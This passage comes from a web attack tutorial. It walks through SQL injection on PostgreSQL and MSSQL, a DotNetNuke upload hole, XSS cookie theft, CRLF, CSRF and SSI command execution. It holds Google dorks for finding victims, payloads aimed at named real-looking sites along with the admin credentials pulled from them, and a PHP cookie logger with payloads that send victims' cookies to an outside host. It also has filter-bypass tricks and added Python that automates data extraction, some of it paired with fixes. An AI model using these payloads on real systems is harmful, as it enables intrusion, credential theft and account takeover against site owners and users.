After -p you put the parameter which is vulnerable (in our case id).
-a is used to pick a random user agent from txt/user-agents.txt
-v1 is verbosity
After --string we put something that sqlmap recognizes as a found letter (some part of text that disappears if the condition is false).
-e is the command that we want to execute. In our case this one:

Code:
SELECT concat(name_username_columns,0x3a,name_password_columns) from table_name where userid=1


[IX] Postgre SQL Injection

1) Postgre SQL Injection?

Postgre SQL Injection is almost the same as SQL Injection. The difference is that the database is PostgreSQL, not MySQL. It is a bit more complicated than the usual SQL Injection. There are some other functions that we are going to use, as you will see.

2) Finding vulnerable sites

Finding vulnerable sites is the same as for the usual SQL Injection, which means that we can use google dorks.
Here are some:

Code:
inurl:faq.php?id=
inurl:event.php?id=
inurl:index.php?id=

3) Site vulnerability check

You found a site that may be vulnerable. To check if the site is vulnerable we add ' at the end of the link.
Code:
http://www.link.com/page.php?page=1'

So if on the page we get:
Code:
Warning: pg_query() [function.pg-query]: Query failed: ERROR: syntax error at or near

or some part of the page disappears, then the site is vulnerable.

4) Finding number of columns

So we know that the site is vulnerable; now we need to find the number of columns. This time we do it with union.
Our link:

Code:
http://www.link.com/page.php?page=1+union+select+all+null--+-

If the page loads normally, that means that there are more columns.

Code:
http://www.link.com/page.php?page=1+union+select+all+null,null,null,null from dual--

We keep adding null until we get an error. If we get an error with 7 nulls, it means that we have 6 columns, i.e. 6 nulls.

5) Finding vulnerable columns

It is easy to find a vulnerable column. Null = 0, so we replace one null at a time with something; if nothing is shown, that column is not usable. That is how we find the vulnerable column.
So:

Code:
http://www.link.com/page.php?page=1+union+select+all+current_database(),null,null,null--+-

If nothing is listed, it means that this column is not usable; we move on to the next one and set this one back to null.

6) Finding database version

We do this with the version() function.
The link which shows us the version:

Code:
http://www.link.com/page.php?page=1+union+select+all+version(),null,null,null--+-

We get something like:
Code:
PostgreSQL 9.0.4 on i486-pc-linux-gnu, compiled by GCC gcc-4.4.real (Ubuntu 4.4.3-4ubuntu5) 4.4.3, 32-bit

7) Finding table name

Same as usual SQL injection, except that the other positions hold null instead of column numbers.
So it should look like:

Code:
http://www.link.com/page.php?page=1+union+select+all+table_name,null,null,null+from+information_schema.tables--+-

We get the table names; if the page prints only one row, add limit+1+offset+N to walk through them. Then we get the columns of the table we want.

8) Finding column name

It is also easy, with no big difference.
This is how it should look:

Code:
http://www.link.com/page.php?page=1+union+select+all+column_name,null,null,null+from+information_schema.columns+where+table_name='users'--+-

Sometimes the quotes are filtered (magic_quotes), so the string literal 'users' has to be written without quotes: convert each character to its decimal ASCII code and glue the codes together with CHR() and ||.
You can use this site:

Code:
http://easycalculation.com/ascii-hex.php

So we have the link (users = 117 115 101 114 115):
Code:
http://www.link.com/page.php?page=1+union+select+all+column_name,null,null,null+from+information_schema.columns+where+table_name=CHR(117)||CHR(115)||CHR(101)||CHR(114)||CHR(115)--+-

9) Taking data from columns

Also almost the same as usual SQL injection; CHR(58) is a colon and joins two columns into one displayed position:
Code:
http://www.link.com/page.php?page=1+union+select+all+username||CHR(58)||password+from+users--+-


[X]Error based Postgre SQL Injection

1) Error based Postgre SQL Injection?

Error-based PostgreSQL injection is an attack on a PostgreSQL backend where the page does not print our UNION data but does print the database error. As the title says, the attack is based on errors: tables, columns and values are all read out of the error message, one value per request.


2) Finding vulnerable sites

Use Google dorks:
Code:
inurl:faq.php?id=
inurl:event.php?id=
inurl:index.php?id=

3) Site vulnerability check

Add ' at the end of the link:
Code:
http://www.link.com/page.php?page=1'

If we get:
Code:
Warning: pg_query() [function.pg-query]: Query failed: ERROR: syntax error at or near

the site is vulnerable.

4) Finding database version


Use the version() function. Casting a text value to int fails, and PostgreSQL quotes the offending value in the error, so the query looks a bit more complicated than usual; don't get confused.


Code:
http://www.link.com/page.php?page=1+and+1=cast(version()+as+int)--

If the cast fails as intended you get this on the page:
Code:
Warning: pg_query() [function.pg-query]: Query failed: ERROR: invalid input syntax for integer: "PostgreSQL 9.0.4 on i486-pc-linux-gnu, compiled by GCC gcc-4.4.real (Ubuntu 4.4.3-4ubuntu5) 4.4.3, 32-bit"

from which we get the database version:
Code:
PostgreSQL 9.0.4 on i486-pc-linux-gnu, compiled by GCC gcc-4.4.real (Ubuntu 4.4.3-4ubuntu5) 4.4.3, 32-bit

5) Finding table name

As said at the start, we can't get all tables at once (cast() only fails on one value), so we use LIMIT 1 together with OFFSET.

OFFSET says which row of the result we want to see.
Our link:

Code:
http://www.link.com/page.php?page=1+and+1=cast((select+table_name+from+information_schema.tables+limit+1+offset+0)+as+int)--

On the page we get this error:
Code:
Warning: pg_query() [function.pg-query]: Query failed: ERROR: invalid input syntax for integer: "pg_type"

from which we have the table pg_type (the first rows are usually system tables from pg_catalog; keep going to reach the application's own tables).

To get the next table we change the offset to 1:
Code:
http://www.link.com/page.php?page=1+and+1=cast((select+table_name+from+information_schema.tables+limit+1+offset+1)+as+int)--

and we get a table like pg_attribute.

6) Finding column name

First convert the table name to decimal ASCII codes, because quotes around the name may be filtered.
We use:

Code:
http://easycalculation.com/ascii-hex.php

Type the string admin and you get the decimal codes:


Code:
97 100 109 105 110

We change this a bit, so it looks like this (CHR() turns each code back into a character, || concatenates them):
Code:
CHR(97)+||+CHR(100)+||+CHR(109)+||+CHR(105)+||+CHR(110)

Now we put it in place of the table name and get the columns:
Code:
http://www.link.com/page.php?page=1+and+1=cast((select+column_name+from+information_schema.columns+where+table_name=CHR(97)+||+CHR(100)+||+CHR(109)+||+CHR(105)+||+CHR(110)+limit+1+offset+0)+as+int)--

and we get the column id. Increase the offset each time until the page loads normally again: the subquery then returns no row, cast(NULL as int) raises no error, and that means there are no more columns in that table.


7) Taking data from columns

We found the columns username and password and now we want the data from them.

Code:
http://www.link.com/page.php?page=1+and+1=cast((select+username+||CHR(58)||+password+from+admin+limit+1+offset+0)+as+int)--

and we get this:
Code:
admin:21232f297a57a5a743894a0e4a801fc3

CHR(58) is a colon (:); we use it as a separator so that two columns come back in one error. The password here is an unsalted MD5 hash (this one is the MD5 of "admin"); change the offset to get the next user.


NOTE (regarding the whole tutorial): from now on I'm not going to explain things in detail, because I think you should be able to figure it out by now. So I'm going to use pictures and code only.


[XI] SQL Injection on ASPX

1) Site vulnerability check

Vulnerable link:
Code:
http://pothys.com/ImageDisplay.aspx?Id=1535&Prod=SilkCotton

We add order by 1--:
Code:
http://pothys.com/ImageDisplay.aspx?Id=1535&Prod=SilkCotton order by 1--

If you get an error page, work with the Id parameter alone:
Code:
http://pothys.com/ImageDisplay.aspx?Id=1535


2) Finding column name

Go to:

Code:
http://pothys.com/ImageDisplay.aspx?Id=1535 having 1=1

HAVING without a GROUP BY makes MSSQL complain that the first selected column is not contained in an aggregate function or the GROUP BY clause, and the error message names that column:


[Image: img2.jpg]


3) Finding table name

Code:
http://pothys.com/ImageDisplay.aspx?Id=1535 and 1=convert(int,(select top 1 table_name from information_schema.tables))

[Image: img3.jpg]


We want the admin table, so we exclude the one we already know and ask for the next:
Code:
http://pothys.com/ImageDisplay.aspx?Id=1535 and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('Tab_FinalOrder')))

[Image: img4.jpg]


The admin table name is AdminMaster.

4) Finding columns in admin table


Code:
http://pothys.com/ImageDisplay.aspx?Id=1535 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name = 'AdminMaster'))

Code:
http://pothys.com/ImageDisplay.aspx?Id=1535 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name = 'AdminMaster' and column_name not in ('Admin_name')))

Column names:

[Image: img5.jpg]


[Image: img6.jpg]


5) Finding username and password

Code:
http://pothys.com/ImageDisplay.aspx?Id=1535 and 1=convert(int,(select top 1 Admin_name from AdminMaster))

[Image: img7.jpg]


Code:
http://pothys.com/ImageDisplay.aspx?Id=1535 and 1=convert(int,(select top 1 Admin_password from AdminMaster))

[Image: img8.jpg]


Code:
Username: admin
Password: pothys!@#
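The extraction loop behind [IX] step 8, [X] steps 5-7 and [XI] steps 3-5, as an added Python example (it is not code from the tutorial): it builds the CHR() encoding, the cast()/convert() wrappers and the two ways of moving to the next row (limit/offset on PostgreSQL, top 1 ... not in (...) on MSSQL), and reads each leaked value out of the error text. It assumes a fetch(payload) callable that sends the injected value of the page / Id parameter and returns the response body; the two fake targets at the bottom are constructed stand-ins that answer the payloads from a fixed table list, so nothing here touches a real site. The MSSQL error text is the one SQL Server 2005 and later return when convert() meets non-numeric text.

```python
import re
from typing import Callable, List, Optional

Fetch = Callable[[str], str]  # sends the injected parameter value, returns the page body

# The two error messages the techniques rely on (PostgreSQL 10+ says "for type integer").
PG_ERR = re.compile(r'invalid input syntax for (?:type )?integer: "([^"]*)"')
MSSQL_ERR = re.compile(
    r"Conversion failed when converting the n?varchar value '([^']*)' to data type int\.")


def chr_concat(text: str) -> str:
    """Write a string literal as CHR(n)||CHR(n)||... so no quotes are needed."""
    return "||".join(f"CHR({ord(c)})" for c in text)


def pg_payload(subquery: str, offset: int) -> str:
    """PostgreSQL: cast() fails on the text value and the error quotes it."""
    return f"1 and 1=cast(({subquery} limit 1 offset {offset}) as int)--"


def mssql_payload(column: str, table: str, seen: List[str]) -> str:
    """MSSQL: exclude every value already seen, as in the ASPX section above."""
    where = ""
    if seen:
        where = f" where {column} not in ({','.join(chr(39) + v + chr(39) for v in seen)})"
    return f"1 and 1=convert(int,(select top 1 {column} from {table}{where}))"


def value_from_error(body: str) -> Optional[str]:
    """Pull the leaked value out of either error message; None means no error."""
    m = PG_ERR.search(body) or MSSQL_ERR.search(body)
    return m.group(1) if m else None


def dump_pg(fetch: Fetch, subquery: str, max_rows: int = 100) -> List[str]:
    """Walk the offset until the page loads normally: cast(NULL) raises no error."""
    found: List[str] = []
    for offset in range(max_rows):
        value = value_from_error(fetch(pg_payload(subquery, offset)))
        if value is None:
            break
        found.append(value)
    return found


def dump_mssql(fetch: Fetch, column: str, table: str, max_rows: int = 100) -> List[str]:
    """Grow the 'not in' list until 'top 1' has nothing left to return."""
    found: List[str] = []
    for _ in range(max_rows):
        value = value_from_error(fetch(mssql_payload(column, table, found)))
        if value is None:
            break
        found.append(value)
    return found


# --- constructed stand-ins for the vulnerable pages; no SQL is executed ------
FAKE_PG_TABLES = ["pg_type", "pg_attribute", "admin"]      # constructed
FAKE_MSSQL_TABLES = ["Tab_FinalOrder", "AdminMaster"]     # constructed


def fake_pg_target(param: str) -> str:
    """Mimics page.php: leaks row N of information_schema.tables via the cast error."""
    m = re.search(r"limit 1 offset (\d+)", param)
    if m and "information_schema.tables" in param:
        n = int(m.group(1))
        if n < len(FAKE_PG_TABLES):
            return ("Warning: pg_query(): Query failed: ERROR: invalid input "
                    f'syntax for integer: "{FAKE_PG_TABLES[n]}"')
    return "<html>normal page</html>"


def fake_mssql_target(param: str) -> str:
    """Mimics ImageDisplay.aspx: leaks the first table not in the exclusion list."""
    m = re.search(r"not in \(([^)]*)\)", param)
    seen = re.findall(r"'([^']*)'", m.group(1)) if m else []
    for name in FAKE_MSSQL_TABLES:
        if name not in seen:
            return ("Conversion failed when converting the nvarchar value "
                    f"'{name}' to data type int.")
    return "<html>normal page</html>"


if __name__ == "__main__":
    print(chr_concat("admin"))
    print(dump_pg(fake_pg_target, "select table_name from information_schema.tables"))
    print(dump_mssql(fake_mssql_target, "table_name", "information_schema.tables"))
```

Against a real page only the fetch callable changes (an HTTP GET with the payload in the vulnerable parameter, returning the body); the loop is identical for both dialects, the only difference being how the next row is selected. The same dump_pg() call with "select username||CHR(58)||password from admin" as the subquery walks the rows of step 7.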


[XII] Dot net nuke

DotNetNuke (DNN) is an ASP.NET CMS. Its FCKeditor provider ships a link gallery page that lets you upload files to the site and keep them there, like an "online gallery". That gallery has a hole: on vulnerable installs anyone can use it to upload files to the site with extensions such as *.gif, *.jpg, *.pdf, *.txt, *.swf...

Google dork to find vulnerable sites:

Code:
inurl:fck/fcklinkgallery.aspx

I'm gonna use this site: 

Code:
http://kellyballancephotography.com/providers/htmleditorproviders/fck/fcklinkgallery.aspx

Now, if the page loads it will look like this:

[Image: image.jpg]


which means we can continue. Now choose option 3 -> File (A File On Your Site) and type this JavaScript into the address bar to trigger the hidden upload control:

Code:
javascript:__doPostBack('ctlURL$cmdUpload','')

A Choose File field and an Upload Selected File button will show up.

*on this site the text colour matches the background, so select the whole page (CTRL+A) and you will see the upload button.


[Image: image.jpg]


Upload the file and access it at sitelink.com/portals/0/filename.extension
->

Code:
http://kellyballancephotography.com/portals/0/config.txt


[XIII] XSS

1) XSS?

XSS is short for Cross Site Scripting. It lets an attacker execute JavaScript in other users' browsers, in the context of the vulnerable site.
You can use XSS in many ways: for simple JavaScript commands, or to steal cookies. We then inject the stolen cookie into our own browser so we are logged in somewhere without the password.


2) Required stuff

Mozila FireFox:
Code:
http://www.mozilla.org/en-US/products/download.html?product=firefox-3.0.5&os=win&lang=en-GB

Add-on Firebug:
Code:
https://addons.mozilla.org/en-US/firefox/addon/firebug/

Add-on FireCookie:

Code:
https://addons.mozilla.org/en-US/firefox/addon/firecookie/

Add-on Live HTTP Headers:
Code:
https://addons.mozilla.org/en-US/firefox/downloads/file/28118/live_http_headers-0.14-fx+sm.xpi

Basic knowledge of JavaScript is recommended.

3) Testing XSS vulnerability

This method applies to sites with a text input and a submit button, and to sites that print a GET parameter back into the page.
e.g. of the GET case:

Code:
www.site.com/index.php?page=<script>alert("XSS")</script>

The command to check site vulnerability is:
Code:
<script>alert("XSS")</script>

Now I will explain what this command does:
<script> - opening script tag
alert("XSS") - window will pop-up saying "XSS"
</script> - close script tag

4) XSS types

Cookie stealing - we steal the cookie of some user (commonly the admin) and put it into our browser, so when we open the site we are already logged in.
Cross-Site Request Forgery - we make the victim's browser send requests for us, without knowing their username or password.
XSS worms - an "evil" script that can spread itself over the whole site.
Door-Forwarding - the script creates an iframe that exploits something or starts a download of some virus, RAT, keylogger, istealer, etc.
Keylogging - you know what keylogging is.

5) Cookie stealing

For cookie stealing we will need: 
-Vulnerable site 
-Web-host for scripts 
-php script

Put this script on some hosting:

cookie.php

Code:
<?php
// attacker-side logger: appends whatever arrives in ?cookie= to a text file
$cookie = isset($_GET['cookie']) ? $_GET['cookie'] : '';   // $HTTP_GET_VARS was removed in PHP 5.4
$file = fopen('cookielog.txt', 'a');
fwrite($file, $cookie . "\n");
fclose($file);
?>

Script to execute on the vulnerable site (each variant sends the victim's cookie to the logger):
Code:
<script>document.location="http://www.link.com/cookie.php?cookie=" + document.cookie;</script>
or
<script>location.href="http://www.link.com/cookie.php?cookie=" + document.cookie;</script>
or
<script>window.open('http://www.link.com/cookie.php?cookie=' + document.cookie);</script>
or
<script>window.location='http://www.link.com/cookie.php?cookie=' + document.cookie;</script>


How does this work?
When a logged-in user opens the page with your cookie logger, their cookie is saved to cookielog.txt. Then we take that cookie and use it ourselves. Here is how:

1) Open Firefox
2) Open the Firebug add-on (the Cookies panel comes from Firecookie)


[Image: aa2.jpg]


3) Type in the cookie name and value. Here is one:
Code:
PHPSESSID=db3e4e100ab6bb912de1b80c4eed7898
from this, the cookie name is PHPSESSID
and the cookie value is db3e4e100ab6bb912de1b80c4eed7898


6) Filter bypassing

1) Deleting the script tag
e.g. if we type <script>alert("XSS")</script> and the page prints only alert("XSS"), the filter removes the <script> and </script> tags (in one pass).
Here is how to bypass that protection: instead of <script>alert("XSS")</script> we put <scr<script>ipt>alert("XSS")</scr</script>ipt>; the filter removes the inner tags, and what is left closes up into the original <script>alert("XSS")</script>.

2) magic_quotes
Explained here:

Code:
http://en.wikipedia.org/wiki/Magic_quotes

If you type <script>alert("XSS")</script> and it prints <script>alert(\"XSS\")</script>, then it is magic_quotes protection: every ' and " gets a backslash in front of it, which breaks the string in your script.
It is a bit harder to bypass. The trick is String.fromCharCode, which builds the string from decimal character codes, so no quotes are needed.
Here is an example:
The link of our cookie logger is http://www.link.com/cookie.php, so we turn <script>location.href="http://www.link.com/cookie.php?cookie=" + document.cookie;</script> into:
Code:
<scr<script>ipt>location.href=String.fromCharCode(104,116,116,112,58,47,47,119,119,119,46,108,105,110,107,46,99,111,109,47,99,111,111,107,105,101,46,112,104,112,63,99,111,111,107,105,101,61)+document.cookie;</scr</script>ipt>

This works because magic_quotes only adds a backslash in front of ' and "; the payload now contains only integers and no quotes at all, so nothing gets escaped.

The decimal codes for http://www.link.com/cookie.php?cookie= were made with this tool:
Code:
Ascii to Decimal
http://pookey.co.uk/binary.php
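The two filters and their bypasses from this section, next to the fix that actually holds, as an added Python example (not code from the tutorial). strip_script_once() is the one-pass tag filter from bypass 1, magic_quotes_gpc() re-implements what PHP's magic_quotes did to request data for bypass 2, and the logger URL is the one used above. Stripping on input, even repeatedly, never catches every variant (case changes, event handlers on other tags); encoding on output does, which is what escape_for_html() shows.

```python
import html


def strip_script_once(s: str) -> str:
    """The filter from bypass 1: removes <script> and </script> a single time."""
    return s.replace("<script>", "").replace("</script>", "")


def nest_script(body: str) -> str:
    """Bypass 1: the inner tags are removed, the outer fragments close up again."""
    return f"<scr<script>ipt>{body}</scr</script>ipt>"


def magic_quotes_gpc(s: str) -> str:
    """What PHP's magic_quotes_gpc did to input: backslash before ' \" \\ and NUL."""
    return (s.replace("\\", "\\\\").replace("'", "\\'")
             .replace('"', '\\"').replace("\x00", "\\0"))


def from_char_code(s: str) -> str:
    """Bypass 2: a JS string literal written as String.fromCharCode(...), no quotes."""
    return "String.fromCharCode(" + ",".join(str(ord(c)) for c in s) + ")"


def cookie_stealer(logger_url: str) -> str:
    """The location.href payload from above, assembled to survive both filters."""
    return nest_script(f"location.href={from_char_code(logger_url)}+document.cookie;")


def escape_for_html(s: str) -> str:
    """The real fix: encode on output instead of stripping on input."""
    return html.escape(s, quote=True)


if __name__ == "__main__":
    payload = cookie_stealer("http://www.link.com/cookie.php?cookie=")
    print("after one-pass strip :", strip_script_once(payload))
    print("after magic_quotes   :", magic_quotes_gpc(payload))
    print("after output encoding:", escape_for_html(payload))
```

The payload passes both filters untouched because it contains no quote, backslash or intact <script> tag; escape_for_html() turns every < into &lt; so the browser renders the text instead of running it.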


[XIV] CRLF

1) CRLF?

Short for Carriage Return and Line Feed (\r\n). CRLF injection is very easy to use: we put a line break into our input, which in a line-based output is the same as adding a new row (\n) ourselves.


2) Vulnerable places

Vulnerable places are anywhere user input is written into line-oriented output. In this tutorial I'm going to use a chat.

3) Exploiting vulnerability and protection

Let's say you send a message and the chat looks like this (the \n stands for a real newline character inside the message, e.g. %0a in the POST body):

Code:
1.4.2012 10:29 - fodex: Why login page is down?
1.4.2012 10:29 - saiR: Look like somebody deleted login database.
1.4.2012 10:29 - Admin: I'm gonna check this out and will announce you.
1.4.2012 10:30 - saiR: Ok go ahead...\n1.4.2012 10:30 - Admin: You are right saiR login database is deleted. Log in here till I get it back: http://vulnerablesite.com/login.php

If the chat is vulnerable, it will look like this:

Code:
1.4.2012 10:30 - saiR: Ok go ahead...
1.4.2012 10:30 - Admin: You are right saiR login database is deleted. Log in here till I get it back: http://vulnerablesite.com/login.php

We wrote the second message "from Admin" ourselves, but users will think the Admin sent it and will log in on the site we gave them; our fake login page records their logins.


4) Vulnerable script


e.g. (htmlspecialchars() encodes < > & and ", but leaves \r and \n alone, so the line break goes straight into the chat)

Code:
<?php
if(isset($_POST['send_message']))
{
   if(!empty($_POST['message']))
   {
      // stops HTML injection, not line injection: newlines survive this call
      $message = htmlspecialchars($_POST['message']);
      // rest of the code that stores/sends the message
   }
}
?>
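The chat from step 3 rendered both ways, as an added Python example (not code from the tutorial): render_naive() mirrors the PHP above (HTML encoding only), render_safe() is the protection the section title promises, and parse_chat() is what a reader or the chat UI makes of the log. SPOOF is a constructed message with the same text as the example, with a real newline where the tutorial writes \n.

```python
import html
import re

LINE = re.compile(r"^(\d+\.\d+\.\d{4} \d+:\d+) - ([^:]+): (.*)$")

# Constructed message: the example above, with a real newline (what %0a in the
# POST body becomes) where the tutorial writes \n.
SPOOF = ("Ok go ahead...\n1.4.2012 10:30 - Admin: You are right saiR login database "
         "is deleted. Log in here till I get it back: http://vulnerablesite.com/login.php")


def render_naive(user: str, msg: str, stamp: str = "1.4.2012 10:30") -> str:
    """Mirrors the PHP above: htmlspecialchars() only. < > & " are encoded,
    but \\r and \\n pass straight through into the chat log."""
    return f"{stamp} - {user}: {html.escape(msg, quote=True)}"


def render_safe(user: str, msg: str, stamp: str = "1.4.2012 10:30") -> str:
    """Fix: a chat record is one line, so line breaks and other control
    characters are not valid message content. Replace them (or reject the message)."""
    clean = re.sub(r"[\x00-\x1f\x7f]+", " ", msg)
    return f"{stamp} - {user}: {html.escape(clean, quote=True)}"


def parse_chat(log: str):
    """What a reader (or the chat UI) sees: one (stamp, user, message) per line."""
    return [LINE.match(line).groups() for line in log.split("\n") if LINE.match(line)]


if __name__ == "__main__":
    for record in parse_chat(render_naive("saiR", SPOOF)):
        print("naive:", record[1], "->", record[2][:40])
    for record in parse_chat(render_safe("saiR", SPOOF)):
        print("safe :", record[1], "->", record[2][:40])
```

With the naive renderer the log contains two records and the second one carries the name Admin; with the control characters removed there is exactly one record, attributed to saiR, and the forged line is just text inside it.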


[XV] CSRF

1) CSRF?

Short for Cross Site Request Forgery. CSRF makes the victim's own browser send a request we prepared to a site where the victim is logged in; the browser adds the session cookie by itself, so the action runs as the victim and we never need their username or password. It is often delivered through an injected link or image URL, which is why it gets mixed up with XSS.


2) Vulnerable places

It can be used when the action accepts the GET method. If the CSRF is done successfully, the attacker can change another user's password. The most common vulnerable places are avatars (an image URL that every visitor's browser fetches).

3) Exploiting vulnerability

Lets say we have profile link:
Code:
http://www.link.com/profile.php

Where you can see user data (username, avatar, email...).
Now when user want to edit his profile using e.g.

Code:
http://www.link.com/edit_profile.php

Now, instead of an avatar link, we add the profile-editing link together with the new value as a GET parameter.


NOTE: profile editing has to accept the GET method, otherwise we can't attack this way.

Add as avatar link:
Code:
http://www.link.com/edit_profile.php?password=newpassword

password is the name of the input (it can be different; it's best to check the source code)

Now when we look at the avatar we won't see a picture (as if there is none). When another user views your avatar, their browser requests that URL with their own session; if the attack was successful, their password has been changed to the one we put in.
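The server-side check that stops the avatar trick, as an added Python example (not code from the tutorial): edit_profile() stands in for a hardened edit_profile.php. It refuses GET (an <img src=...> can only issue GET) and then requires a per-session synchronizer token that the forged request cannot carry, because the token lives in the victim's page, not in a URL the attacker chooses. The request and session are plain dicts, and the user table is constructed.

```python
import hmac
import secrets
from typing import Dict, Tuple

# Constructed state: one logged-in user.
USERS: Dict[str, str] = {"alice": "old-password"}


def new_session(user: str) -> Dict[str, str]:
    """Log a user in and issue a per-session CSRF token (synchronizer token)."""
    return {"user": user, "csrf": secrets.token_hex(16)}


def edit_profile(request: Dict, session: Dict[str, str],
                 users: Dict[str, str]) -> Tuple[int, str]:
    """Hardened edit_profile.php. request = {"method": ..., "form": {...}}.
    The browser attaches the session cookie automatically (here: the session
    argument), which is exactly why the cookie alone must not authorise a change."""
    if request["method"] != "POST":
        # the avatar <img> can only send GET: never change state on GET
        return 405, "use POST"
    form = request.get("form", {})
    token = form.get("csrf_token", "")
    # constant-time compare against the token issued to this session
    if not hmac.compare_digest(token, session["csrf"]):
        return 403, "bad csrf token"
    users[session["user"]] = form["password"]
    return 200, "password changed"


if __name__ == "__main__":
    session = new_session("alice")
    users = dict(USERS)
    # what the victim's browser sends when it fetches the malicious avatar
    print(edit_profile({"method": "GET", "form": {"password": "newpassword"}}, session, users))
    # a legitimate form submission carrying the token from the page
    print(edit_profile({"method": "POST",
                        "form": {"password": "newpassword", "csrf_token": session["csrf"]}},
                       session, users))
```

The token must be unpredictable and bound to the session (a fresh secrets.token_hex per login is enough) and must be compared in constant time; a forged request that guesses or omits it gets a 403 and the password stays as it was.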



[XVI] Server Side Includes | Server Side Inclusion

1) Introduction Server Side Includes

Server Side Includes let the web server do some things for us: with SSI directives a page can include other files, print server variables, and run commands or CGI scripts (which in turn can update a database, send mail, and so on). The directives are executed by the server each time the page is requested. The default extension for SSI files is .shtml.
If the server config does not already enable SSI for that directory, a .htaccess file in the directory where the .shtml is located can turn it on (as long as AllowOverride permits it).
SSI is disabled by default; you enable it by creating a new .htaccess file with this config:

Code:
AddType text/html .shtml
AddHandler server-parsed .shtml
AddHandler server-parsed .html
Options Indexes FollowSymLinks Includes

2) SSI creating

A directive starts with <!--# 
A simple directive looks like this:
<!--#<command> <parameter>="<value>" -->

<command> - 
Code:
config
include
if / elif / else / endif (flow control)
set
printenv
echo
exec
fsize
flastmod

Time and date come from echo of the DATE_LOCAL or DATE_GMT variable (the format is set with config timefmt).
With --> we end the directive.

script e.g. (echo prints a variable, not a literal, so set one first)
Code:
<!--#include file="yourfilename.txt" -->
<!--#set var="msg" value="This will write this stupid text." --><!--#echo var="msg" -->

3) Server Side Inclusion

The Server Side Inclusion attack is a very useful method. Basic knowledge of Bash (or Batch on Windows) is recommended.
A site is vulnerable to SSI injection when the extensions ".shtml", ".shtm" or ".stm" are mapped to server-parsed (Includes enabled) in the Apache config and we can get our own content into such a file, e.g. through an upload.
e.g. we can create a file with this directive:
Code:
<!--#exec cmd='ls -la'-->

Save it as a .shtml file, upload it and open it on the site.

I think you already know what is going to happen: the server runs the command and prints its output in the page. (The usual fix on the server side is Options IncludesNOEXEC, which keeps #include working but disables #exec.)
